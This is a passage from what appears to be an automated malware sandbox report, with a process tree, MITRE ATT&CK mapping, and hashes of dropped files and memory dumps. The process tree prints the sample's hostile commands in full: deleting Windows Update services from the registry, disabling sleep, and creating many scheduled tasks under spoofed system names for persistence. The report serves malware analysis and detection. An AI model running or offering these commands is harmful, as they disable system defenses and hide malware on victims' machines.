      cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4836
    - - C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:1568
    - - C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:1556
    - - C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:4884
    - - C:\Windows\system32\sc.exe
        
        sc stop bits
        5⤵
        Launches sc.exe
        
        PID:4276
    - - C:\Windows\system32\sc.exe
        
        sc stop dosvc
        5⤵
        Launches sc.exe
        
        PID:992
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
        5⤵
        
        PID:3600
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
        5⤵
        
        PID:2608
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
        5⤵
        Modifies security service
        
        PID:3456
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
        5⤵
        
        PID:1032
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        5⤵
        
        PID:1516
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1540
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1780
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2276
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4124
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2092
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell <#xglvndu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineGNC' /tr '''C:\Program Files\Google\Chrome\updaterchr.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updaterchr.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineGNC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineGNC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updaterchr.exe' }
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4428

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 8 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\SppExtComObj.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4088

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3868

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 12 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1884

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Libraries\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1984

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Users\Public\Libraries\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3656

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 9 /tr "'C:\Users\Public\Libraries\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:460

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2600

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2036

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3464

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\System.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4728

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4724

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4380

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\Program Files\Common Files\microsoft shared\MSInfo\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4128

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files\Common Files\microsoft shared\MSInfo\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3440

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\Program Files\Common Files\microsoft shared\MSInfo\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3380

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\System.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4024

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5060

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:456

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\odt\WmiPrvSE.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4960

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\odt\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4820

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 14 /tr "'C:\odt\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4800

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\Local Settings\sihost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1644

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\Admin\Local Settings\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1512

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\Local Settings\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1888

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Windows\fr-FR\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3968

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Windows\fr-FR\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3284

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 11 /tr "'C:\Windows\fr-FR\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1080

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:1444

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
223bd4ae02766ddc32e6145fd1a29301

SHA1
900cfd6526d7e33fb4039a1cc2790ea049bc2c5b

SHA256
1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e

SHA512
648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e1d7973fb9071815b4241da5ec0dfb6a

SHA1
41f06afbd0ac9f9a0b226a2dd6fa9495d83209b9

SHA256
b3953ac9f5752d996ec2545864d6ccf09ffe4b0f84f41a2cc52a95ad8103212b

SHA512
66163114aba8867561ceac2124bc2060c351cb4a83c4f8d40bc6bfd8042881690ea8152e2b58ec55b4b6de17e1610642c90df602e1fb2658b4c3d0783f3a0900

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e1d7973fb9071815b4241da5ec0dfb6a

SHA1
41f06afbd0ac9f9a0b226a2dd6fa9495d83209b9

SHA256
b3953ac9f5752d996ec2545864d6ccf09ffe4b0f84f41a2cc52a95ad8103212b

SHA512
66163114aba8867561ceac2124bc2060c351cb4a83c4f8d40bc6bfd8042881690ea8152e2b58ec55b4b6de17e1610642c90df602e1fb2658b4c3d0783f3a0900

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e1998d7d07a2cde3ba7241ee388b36c2

SHA1
c229adffd103824362426c4e3103b7b415426990

SHA256
effdbc6b49698dd85890627cdc91b8594c7ebb0f43cead36843f949a9fa4358b

SHA512
5f0a2b70935ef9d3ef55f32904588d584d1e0fe8d9e0bba1b763304a1b71b2d99c5bf6cfe8327b4505a26cc3f8c72c1946ebc702c998499cce21fa7a84315720

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
f744cd7aaf7746b659b70728f3172e24

SHA1
cbd6215e6f9416d2bcd48e6e9f56618c48fbbd00

SHA256
917a1e7bd5e754048e17c20e320bc5f06644c7292e7c38334743dcb50e3aec15

SHA512
394f71c4674543f74bef27b0314f997052a1ce0113ce923c4303ea81319995184a55e8582d163bd163b0723e7beb2596f01a6e9e875f11568f117b0218f64fe0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
f744cd7aaf7746b659b70728f3172e24

SHA1
cbd6215e6f9416d2bcd48e6e9f56618c48fbbd00

SHA256
917a1e7bd5e754048e17c20e320bc5f06644c7292e7c38334743dcb50e3aec15

SHA512
394f71c4674543f74bef27b0314f997052a1ce0113ce923c4303ea81319995184a55e8582d163bd163b0723e7beb2596f01a6e9e875f11568f117b0218f64fe0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
08526e4d8fed0a382c243c9aa8b1fe45

SHA1
f3da4b97529aaa38230db8bfa34a345bbc211622

SHA256
b5044625d66b7835745c7c4efa14d21aaf4ee42bf971f8bbc44f04416b91441f

SHA512
cbeb569db60eabd89c13b073f1bdf7ba991b6206e75f548396a150b08a0ffed1962d88d664e069c64ac740afbb69941df2f43e81a3f138e2185934967898941d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
12eda0b7bc8f816effb149b10a7b2eec

SHA1
ce7fc9a67f7115afa8b5ec9a3574926e12a6edad

SHA256
d92e356568df5fc47e372f9d25d7d50617ac72f3d7a7dde3d6737b8f6da3676b

SHA512
089e6271458abed8e1dfd3c37a16eecfe19c3b4d910ff6a9a8a6618bac128c4170ccb0b8381ad8c26ceb7a82352d90a3420122113da7dca56cee68af1cb562f1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
12eda0b7bc8f816effb149b10a7b2eec

SHA1
ce7fc9a67f7115afa8b5ec9a3574926e12a6edad

SHA256
d92e356568df5fc47e372f9d25d7d50617ac72f3d7a7dde3d6737b8f6da3676b

SHA512
089e6271458abed8e1dfd3c37a16eecfe19c3b4d910ff6a9a8a6618bac128c4170ccb0b8381ad8c26ceb7a82352d90a3420122113da7dca56cee68af1cb562f1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
fec78ebbd765e6f8d91ff70218cfeb45

SHA1
11018ec3fa5d64501496c37f8687b773da21e68e

SHA256
29086aafe3d9aa700651b295c0007d7832d7ac4fca9e02702706566b7d42f20d

SHA512
3534898dc42185a99c3be830121870ab99e9ff1857cb165ce50f45fe205c4f3cef708e42f914fba573d88e31ac9f719d101d4ddd5b94b848440ef2d6dbcf4942

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
fec78ebbd765e6f8d91ff70218cfeb45

SHA1
11018ec3fa5d64501496c37f8687b773da21e68e

SHA256
29086aafe3d9aa700651b295c0007d7832d7ac4fca9e02702706566b7d42f20d

SHA512
3534898dc42185a99c3be830121870ab99e9ff1857cb165ce50f45fe205c4f3cef708e42f914fba573d88e31ac9f719d101d4ddd5b94b848440ef2d6dbcf4942

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
05b6c06ab069653a66ec4cc1bff45751

SHA1
9699b5d0fbdc9a0153abcfebf8cb6a1c083c5b6f

SHA256
db5a77c29b71d731dfca5828b1ae51e20a7f77b366caeb566fbf2dd58f13aff1

SHA512
8a97f3acb83a6674294f3f8fe6c0d8a84d3501a48eaae5577f8bf0c175a1f639d705d0259d3092c457df02f9709fb68e4a96acd6e50423b657eb134ae1ccfb24

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
05b6c06ab069653a66ec4cc1bff45751

SHA1
9699b5d0fbdc9a0153abcfebf8cb6a1c083c5b6f

SHA256
db5a77c29b71d731dfca5828b1ae51e20a7f77b366caeb566fbf2dd58f13aff1

SHA512
8a97f3acb83a6674294f3f8fe6c0d8a84d3501a48eaae5577f8bf0c175a1f639d705d0259d3092c457df02f9709fb68e4a96acd6e50423b657eb134ae1ccfb24

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6bf2927575032d77fab2956579e56348

SHA1
55bfbdacbf4a787b232793f19eca4df667722621

SHA256
a8f97ad6d46dc8b95328e3d85c48451537b2c71855a5913f7b2f3305dab0b6f0

SHA512
7649c7f3c6d753ce6d374798f1f9e0bc6aa84fd445407bd0a0a4cfaa6f48c5d54deb0c836b39b5104c9e82922c0daa84fe824c43f84ae89860c7d1c68610decc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6bf2927575032d77fab2956579e56348

SHA1
55bfbdacbf4a787b232793f19eca4df667722621

SHA256
a8f97ad6d46dc8b95328e3d85c48451537b2c71855a5913f7b2f3305dab0b6f0

SHA512
7649c7f3c6d753ce6d374798f1f9e0bc6aa84fd445407bd0a0a4cfaa6f48c5d54deb0c836b39b5104c9e82922c0daa84fe824c43f84ae89860c7d1c68610decc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6bf2927575032d77fab2956579e56348

SHA1
55bfbdacbf4a787b232793f19eca4df667722621

SHA256
a8f97ad6d46dc8b95328e3d85c48451537b2c71855a5913f7b2f3305dab0b6f0

SHA512
7649c7f3c6d753ce6d374798f1f9e0bc6aa84fd445407bd0a0a4cfaa6f48c5d54deb0c836b39b5104c9e82922c0daa84fe824c43f84ae89860c7d1c68610decc

Download Submit
C:\Users\Admin\AppData\Local\Temp\43d48b04-cfd2-48e8-8a35-6a3da54393dd.vbs

Filesize
492B

MD5
e43c63a978a304c28065e069a2fe6ae6

SHA1
864f86561b6c6e10c21884dd67c83103ca0e07f5

SHA256
94e66fc4667f0d0b242eeec45e40a42d9db4d62d8f59b038cecaa48db9b9a191

SHA512
3d9e9e46ed337b7b4dd822dd5d617084d5689640fc7fdab030c81ba317f8748e453cf2a8be63015b05a41c43b6aed5a7305b0ff895cf78fc8640ecc5e0d42749

Download Submit
C:\Users\Admin\AppData\Local\Temp\50362a41-827c-48d9-a6cc-56aedcc14b1a.vbs

Filesize
716B

MD5
784925bbed2bef41065b0db38181a99f

SHA1
ac9d638458a1873a6143d730725dc099db287210

SHA256
9ba1d598f01b9f2df3f38521cffc630767bffa32b96cd96c7654e3c57f04daed

SHA512
27d02bda1886c1637fbf7fb81dac39f3ee6ee43512e52c4601d240f69b069629e117b6cc74831099b23fa32978b5f8150b7341e5d5aa4c6d77b2c76803260008

Download Submit
C:\Users\Admin\AppData\Local\sihost.exe

Filesize
1.8MB

MD5
0cbc609dbbf77d3a17f6ace3ceb253fd

SHA1
85138c1167db915decaaa68805118128385bf5db

SHA256
985cc8d9e6aeb8fc88dbe66cda331ee2ca3d8b298b81f17b00837c0a9d56a06d

SHA512
6fda0fba163cec1699518afaf2aef541a2dc6e3ba63ec19f35cf054c079cdaab322188dd88e9aa66f2631165597abced4acc798c60cbe9d102411a05d4e7ccf8

Download Submit
C:\Users\Admin\AppData\Roaming\Chrome.exe

Filesize
4.0MB

MD5
b5a62265f33f52c3020e949728f5aad3

SHA1
0b817707735fb6a72f8351cc2b27b7383a758a52

SHA256
cf1a1bdb5cf1facbd74ca1b5671fc5e6534245f00be9bb38cba69f1ab8677e93

SHA512
8f90833f6358b864f5420706c84351f70a4abb575b81c5a506e36c67d2b48dbae9c5a3355f5eeb662e6b1ab9aae1d59ced877701a5ecac2e390f0ec96d42c034

Download Submit
C:\Users\Admin\AppData\Roaming\Chrome.exe

Filesize
4.0MB

MD5
b5a62265f33f52c3020e949728f5aad3

SHA1
0b817707735fb6a72f8351cc2b27b7383a758a52

SHA256
cf1a1bdb5cf1facbd74ca1b5671fc5e6534245f00be9bb38cba69f1ab8677e93

SHA512
8f90833f6358b864f5420706c84351f70a4abb575b81c5a506e36c67d2b48dbae9c5a3355f5eeb662e6b1ab9aae1d59ced877701a5ecac2e390f0ec96d42c034

Download Submit
C:\Users\Admin\AppData\Roaming\Surrogate.exe

Filesize
2.1MB

MD5
55cfab1c7d81b1e4a9df2cce4f279fc8

SHA1
b4853d2d5e40020fcb396928e27b6b8984894258

SHA256
2b4c1344fac38c41d972249acac760e7d9e028997b288012f31d80b8cb7ccd8a

SHA512
6ba677fb24a9c9db77ee14be8a2e800ed3838a480fd457f711af8a798e4481adeee31611289dc564460353c7150007bce9f79eda67554f8701aca87c43c2da89

Download Submit
C:\Users\Admin\AppData\Roaming\Surrogate.exe

Filesize
2.1MB

MD5
55cfab1c7d81b1e4a9df2cce4f279fc8

SHA1
b4853d2d5e40020fcb396928e27b6b8984894258

SHA256
2b4c1344fac38c41d972249acac760e7d9e028997b288012f31d80b8cb7ccd8a

SHA512
6ba677fb24a9c9db77ee14be8a2e800ed3838a480fd457f711af8a798e4481adeee31611289dc564460353c7150007bce9f79eda67554f8701aca87c43c2da89

Download Submit
C:\Users\Admin\Local Settings\sihost.exe

Filesize
1.8MB

MD5
0cbc609dbbf77d3a17f6ace3ceb253fd

SHA1
85138c1167db915decaaa68805118128385bf5db

SHA256
985cc8d9e6aeb8fc88dbe66cda331ee2ca3d8b298b81f17b00837c0a9d56a06d

SHA512
6fda0fba163cec1699518afaf2aef541a2dc6e3ba63ec19f35cf054c079cdaab322188dd88e9aa66f2631165597abced4acc798c60cbe9d102411a05d4e7ccf8

Download Submit
C:\componentdrivercrt\Bridgeruntime.exe

Filesize
1.8MB

MD5
0cbc609dbbf77d3a17f6ace3ceb253fd

SHA1
85138c1167db915decaaa68805118128385bf5db

SHA256
985cc8d9e6aeb8fc88dbe66cda331ee2ca3d8b298b81f17b00837c0a9d56a06d

SHA512
6fda0fba163cec1699518afaf2aef541a2dc6e3ba63ec19f35cf054c079cdaab322188dd88e9aa66f2631165597abced4acc798c60cbe9d102411a05d4e7ccf8

Download Submit
C:\componentdrivercrt\Bridgeruntime.exe

Filesize
1.8MB

MD5
0cbc609dbbf77d3a17f6ace3ceb253fd

SHA1
85138c1167db915decaaa68805118128385bf5db

SHA256
985cc8d9e6aeb8fc88dbe66cda331ee2ca3d8b298b81f17b00837c0a9d56a06d

SHA512
6fda0fba163cec1699518afaf2aef541a2dc6e3ba63ec19f35cf054c079cdaab322188dd88e9aa66f2631165597abced4acc798c60cbe9d102411a05d4e7ccf8

Download Submit
C:\componentdrivercrt\ZBinI4WKT41t3dmuG1vLpr.bat

Filesize
41B

MD5
3322a8aef5e6a43a90a4692ead29c89c

SHA1
cc619cb8571dfbd81fa857bab669275a3d8c5c20

SHA256
575f2d76bf27057196347906ab0d28330d70b80c64d2b401a428a7c5368a57a3

SHA512
cc8aa9755200a0e4e9654dfd0cbf4258d16f1a93e937d8da9a329533f31b334308016f8b171c1f9d1eac17c11b1574b88adc6b0c642487fd769a27c5c46a81b9

Download Submit
C:\componentdrivercrt\nxBoatTP05v4ZJUajUoag6w.vbe

Filesize
217B

MD5
24857bb3ba18613330c384b964de01d3

SHA1
4ffc2c3dd822c9523dd5611014a778d051509a5c

SHA256
301ca26bd2f3ed9716e6d62f24f0d0c7597b86d6a180ff4da903b84b92000941

SHA512
0ae685b0aa514e98a0f2e6787d0fbbdd547fbb64e0f37dd8c75f93ae646e19dae4f3eddd3cc57e2c8ab13785b884cd54ee9bc2ebd74176145ee8b56fea44221d

Download Submit
memory/1624-201-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp

Filesize
10.8MB

Download
memory/1624-224-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp

Filesize
10.8MB

Download
memory/1712-204-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp

Filesize
10.8MB

Download
memory/1712-229-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp

Filesize
10.8MB

Download
memory/1924-220-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp

Filesize
10.8MB

Download
memory/1924-197-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp

Filesize
10.8MB

Download
memory/2252-145-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp

Filesize
10.8MB

Download
memory/2252-138-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp

Filesize
10.8MB

Download
memory/2440-203-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp

Filesize
10.8MB

Download
memory/2440-228-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp

Filesize
10.8MB

Download
memory/2604-157-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp

Filesize
10.8MB

Download
memory/2604-155-0x0000000000C90000-0x0000000000E5C000-memory.dmp

Filesize
1.8MB

Download
memory/2604-199-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp

Filesize
10.8MB

Download
memory/2604-160-0x0000000002F90000-0x0000000002FE0000-memory.dmp

Filesize
320KB

Download
memory/2604-200-0x00000000014F9000-0x00000000014FF000-memory.dmp

Filesize
24KB

Download
memory/3064-198-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp

Filesize
10.8MB

Download
memory/3064-219-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp

Filesize
10.8MB

Download
memory/3136-211-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp

Filesize
10.8MB

Download
memory/3136-238-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp

Filesize
10.8MB

Download
memory/3444-156-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp

Filesize
10.8MB

Download
memory/3444-132-0x00000000006B0000-0x00000000006B8000-memory.dmp

Filesize
32KB

Download
memory/3444-134-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp

Filesize
10.8MB

Download
memory/3732-225-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp

Filesize
10.8MB

Download
memory/3732-202-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp

Filesize
10.8MB

Download
memory/3928-161-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp

Filesize
10.8MB

Download
memory/4012-146-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp

Filesize
10.8MB

Download
memory/4012-136-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp

Filesize
10.8MB

Download
memory/4012-208-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp

Filesize
10.8MB

Download
memory/4012-235-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp

Filesize
10.8MB

Download
memory/4012-135-0x000001A31C830000-0x000001A31C852000-memory.dmp

Filesize
136KB

Download
memory/4428-214-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp

Filesize
10.8MB

Download
memory/4428-180-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp

Filesize
10.8MB

Download
memory/4440-205-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp

Filesize
10.8MB

Download
memory/4440-236-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp

Filesize
10.8MB

Download
memory/4476-206-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp

Filesize
10.8MB

Download
memory/4476-240-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp

Filesize
10.8MB

Download
memory/4520-234-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp

Filesize
10.8MB

Download
memory/4520-212-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp

Filesize
10.8MB

Download
memory/4568-246-0x000000001E9C0000-0x000000001EB82000-memory.dmp

Filesize
1.8MB

Download
